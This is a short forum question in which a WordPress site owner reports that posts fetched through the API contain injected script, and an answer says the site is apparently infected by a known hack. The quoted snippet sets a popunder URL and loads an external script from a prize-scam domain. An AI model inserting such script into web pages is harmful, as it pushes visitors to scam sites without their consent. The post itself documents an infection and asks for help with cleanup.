# Showing unwanted script in wordpress posts fetch API

Tags: wordpress

My website is on wordpress and I am trying to fetch posts with API. But it's showing this

````
var popunder = {expire: 1, url: "https://takemore-prizes.life/?u=mr1kd0x&o=f5pp7z3&t=p&cid=2q8mp6f8s7v1im"
};
</script>
<script src="https://takemore-prizes.life/js/popunder.js"></script>```
How can I get rid of it?
````

Answer (score 0):

Your website is infected, probably with the [.bt hack](https://www.wpaos.com/2020/06/05/wordpress-hacked-how-to-fix-bt-wordpress-hack/).